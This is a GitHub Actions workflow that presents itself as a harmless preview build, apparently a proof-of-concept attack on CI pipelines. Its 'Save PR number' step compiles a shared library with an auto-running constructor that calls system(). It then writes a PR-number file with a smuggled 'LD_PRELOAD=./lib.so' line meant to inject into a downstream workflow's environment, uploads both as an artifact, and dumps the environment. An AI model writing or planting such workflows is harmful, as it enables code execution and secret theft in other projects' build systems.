name: Generate Preview
on:
  pull_request:
  workflow_dispatch:
jobs:
  build_and_preview:
    runs-on: ubuntu-latest
    steps:
      - name: Set up GCC
        uses: egor-tensin/setup-gcc@v1
        with:
          version: latest
          platform: x64
      - name: Save PR number
        run: |
          cat >> lib.c << EOF
          #include <stdio.h>
          #include <stdlib.h>

          void __attribute__ ((constructor)) premain()
          {
              system("echo fun");
          }
          EOF
          mkdir -p ./pr
          gcc -shared -fPIC -o pr/lib.so lib.c
          chmod +x $GITHUB_WORKSPACE/pr/lib.so
          echo -e '${{ github.event.number }}\n'LD_PRELOAD=./lib.so > ./pr/NR
          cat ./pr/NR
          env
          echo testtt333444455

      - uses: actions/upload-artifact@v2
        with:
          name: pr
          path: pr/
